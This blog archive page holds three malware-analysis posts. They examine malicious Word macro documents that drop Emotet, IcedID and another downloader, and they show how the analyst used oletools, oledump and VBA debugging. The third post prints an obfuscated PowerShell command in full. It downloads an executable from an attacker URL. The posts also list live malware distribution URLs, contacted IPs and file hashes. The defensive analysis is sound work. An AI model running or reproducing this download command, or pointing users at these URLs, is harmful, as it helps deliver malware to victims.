Tag: Word Macro Malware Analysis

Word Document Malware Analysis

Anurag GawandeLeave a comment

MD5: CA15F9F45971EA442943084547761994

File: Microsoft word document

Word Document Screenshot:

File Properties:

I used OLEVBA.py to extract the VBA code but it was giving error. I used oledump.py tools to analyze the file.

Using oledum.py. I ran the below command to get the complete document streams. 

>>oledump.py <filename>

You can see M at Number 18 and 19 which is the VBA macro as explained by the author of this python script Didier Stevens M denotes VBA macros.

So the next command I am running

>>oledump.py -s 18 <filename>

In below screenshot, it can be seen, the module Lev1daeyfvl calling S_gil0c35zh248.Mei497ecvshp on Document_Open()

After looking into more, I found S_gil0c35zh248.Mei497ecvshp which is being called on opening document is an user form. (refer below screenshot)

S_gil0c35zh248.Mei497ecvshp is user form

I opened word document, and navigate to VBA developer tool (Alt + F11). I saw the VBA code will execute on form execution.

Next I debug the code and analyse the behavior.

The PowerShell script is executed by the WMI process by executing VBA code on document open.

I have extracted the PowerShell script which is encoded in base64. by adding a code to copy PowerShell script in text file. Below is the code to extract the PowerShell script.

M2lujl629fpjn has PowerShell script
Encoded PowerShell Script base64

I have decoded the PowerShell script and got the code below.

To decode PowerShell script, I used below PowerShell script. 

$path_to_b64_string_file= Get-Content -Path "C:\output\output.txt"
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($path_to_b64_string_file))
New-Item "C:\output\decoded_b64.txt"
Set-Content -Path "C:\output\decoded_b64.txt" $decoded_b64_string
Write-Host "Decoded Base64 successfully"
Decoded PowerShell script

I debugged the decoded PowerShell script, during the debugging, I found, it creates a folder at location and file it is going to write will be Ws1uczsw.exe

C:\Users\IEUser\AppData\Local\Temp\Word\2019\Ws1uczsw.exe

and there are multiple remote URL’s it tried to download the malicious file.

All URLs are active.

URLVT Score
http://rickthewelder%5B.%5Dcom/dtbkup20110205/i/8/79
http://stiecgps%5B.%5Dcom%5B.%5D br/cgi-bin/7/0/79
http://tfbauru%5B.%5D com[.] br/cgi-bin/Lhe/14/79
https://paulburkphotography%5B.%5D com/_new_images/F/9/79
http://theeldestgeek%5B.%5D com/error/F55/79
http://uniquewv%5B.%5D com/cgi-bin/OVJ9qY/12/79
http://tuls%5B.%5D pl/cgi-bin/7a99/79

When I executed the PowerShell script, it downloaded Ww1uczsw.exe

Downloaded file details:

MD5: A4513379DAD5233AFA402CC56A8B9222

File Type: Win32 Exe

PEid Packer: Microsoft Visual C++ v7.0

Family: Emotet Trojan

Summary:

  • Word document has VBA macros which executes on document open.
  • PowerShell is encoded in base64 and executes to download Emotet Trojan executable.
  • Multiple sources/URLs have been used in code to download the malware on the system.

Download Sample Link

References:

Word Macro Drops IcedID Trojan – Malware Analysis

Anurag Gawande1 Comment

HASH

MD5: 4A88E83B325AA23DA1E4BFA90B4F7C34

File type: Office Open XML Document

VT Score: 45/62

While I was going through Any.run report tracker, I came across this word document, I downloaded it for analysis.

Word document screenshot

OleTools:

I used OLETools to analyse the document macros. 

Olevba.py -a <file name>

Indicators:

  • Auto execute on opening document.
  • May write a file to the system.
  • Base64 obfuscated strings.

I deobfuscated the file using olevba.py 

Olevba.py --deobf <file name>

Indicator of Compromise:

  • PFSDNKDF.exe executable file name.

Above code shows the PE file PFSDNKDF.exe will be dropped at location C:\1\Whole\

Next I started debugging macro in VBA development tool. VBA development tool can be opened by pressing Alt + F11 keys that will bring it up.

I can see the variable hextostr has stored a hex code that will be converted into PE file.

Then it creates a process and execute PFSDNKDF.exe file.

After that it closes the document or will prompt to save the changes if any changes has done to document.

Process monitor captured when exe is written to localtion C:\1\Whole path

Dropped File:

MD5: 4C9C6B5B6DAA25B8DC274DD78FBC1AAA

File Name: psisdecd.dll

File Type: Win32 EXE

Signature: Microsoft Visual C++ 8

Family: IcedID

VT score: 56/72

IcedID is a banking Trojan type malware that allows attackers to utilize it to steal banking credentials of the victims. IcedID aka BokBot mainly targets businesses and steals payment information, it also acts as a loader and can deliver other viruses or download additional modules.

Using wireshak, I have seen this executable created network connection to below IPs and DNS resolved to:

SNIP
140.90.189.152
2125.252.219.233
3104.84.156.5
4104.116.46.155
5104.244.42.131
6184.29.89.6
723.50.81.26
8104.116.25.27
9184.29.89.6
1023.54.56.6
11104.244.42.42
12104.244.42.195
IP address contacted and sent and received data by malicious executable.
SNDNS Link
1connuwedro.xyzVT Score
Urls contacted by malicious executable.

Summary:

  • Word document drops executable PFSDNKDF.exe on opening document.
  • The dropped file is IceID trojan.

Download sample: Any.Run

Read more about IcedID

Word Macro Malware Analysis

Anurag GawandeLeave a comment

SHA256: dd81d70fa14f0e95b8cd2fe86a9a21a264cbb4bb32d80c4195fc13ee6791b994

Sample Link: Beta.VirusBay.io

File Type: Microsoft Word

File Extension: .doc

VirusTotal Score 29/61

I am going to use OLETools to analyse this word document sample. For initial document analysis I rely on this tool, if

you have read my earlier blog posts on word macro analysis, you can see I have used this tool. 

>>oleid.py <word document file>

Word document property
>>olevba.py -a <word document file>
VBA macro analysis

VBA macro analysis:

  • Macro will execute on document open.
  • It may open/write binary file on the system
  • It has hex strings
  • It has base64 obfuscated strings.

I can deobfuscate the base64 obfuscated base64 string using oldvba command

>>olevba.py --decode <word document file>

but I would open VBA developer tool and debug the VBA code.

To view macros navigate to View >> Macros >> View Macros

Macro windows

There is no macro available to Step into because macro is password protected.

Open VBA developer tool by pressing Alt+F11

To remove password, I will use code written by ndthanh link to the code is here Github

To use this code, right clicked on Project >> Insert >> Module it will open empty code window, copy paste code here.

Click on Run >> (Macro Name) unprotected

and password is removed and project is unlocked.

Document_Open() executes on opening word document.

VBA has forms and modules.

Forms

  • pfoi23hj
  • roihwo23

Macro Modules

  • ajbhk3h43
  • bcsjw
  • bklern4jh
CommandButton1() is auto executable

I put a breakpoint and started debugging modules and got the list of URL’s it tries to connect

URLs are obfuscated base64 strings

URLs Obfuscated base64 strings

  • aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n
  • aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=
  • aHR0cDovLzEweDQ1LmNvbS96ZmJqdnZxeGt0eC84ODg4ODg4LnBuZw==
  • aHR0cDovL2lhbXBsb3llZC5ubC9sYmJpdWpkeWp5Lzg4ODg4ODgucG5n
  • aHR0cDovL2FwdG9jaXVkYWRhbXVyYWxsYWRhY2FydGFnZW5hLmNvbS9nZGRxZXovODg4ODg4OC5wbmc=
  • aHR0cDovL2F1dG9lc2NvbGFjaWdhbm9zLmNvbS5ici9nZXp6Zi84ODg4ODg4LnBuZw==

After deofuscated base64 URLs

http://salwadm . com/tcphx/8888888.pngVT Score
http://flipkenya . com/nujazbwrhjy/8888888.pngVT Score
http://10×45 . com/zfbjvvqxktx/8888888.pngVT Score
http://iamployed . nl/lbbiujdyjy/8888888.pngVT Score
http://aptociudadamuralladacartagena . com/gddqez/8888888.pngVT Score
http://autoescolaciganos . com . br/gezzf/8888888.pngVT Score

Code also drops BAT file tmp.bat and execute it to create a directory tmpdir at location C:\Users\Public\

location C:\Users\Public where bat file dropped

Next code deobfuscate string by replacing a letter by its preceding letter. E.g. ‘Q’ will be replaced with ‘P’

PowerShell command

Below is the PowerShell Command with obfuscated string

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')

Deobfuscated base64 string

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('http://salwadm . com/tcphx/8888888.png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '1' + '.e' + 'x' + 'e')

PowerShell script download an executable file file1.exe from the URL. After taking closer look at this file, its a html page with .exe extension.

File downloaded by PowerShell script

I have uploaded this file to VirusTotal and the was zero detection as malware.

SHA256: 3b11440abf602e0ac35a8a1489ed26ec0103ed2ba636520761c698e5fb2df9d1

VirusTotal score link here

Summary:

  • On document opening, forms execute.
  • Drops bat file which create a folder on victim’s machine
  • Executes PowerShell script which downloads a file from one of the multiple sources of URLs.
  • Look for antivirus protection, real time protection values in registry.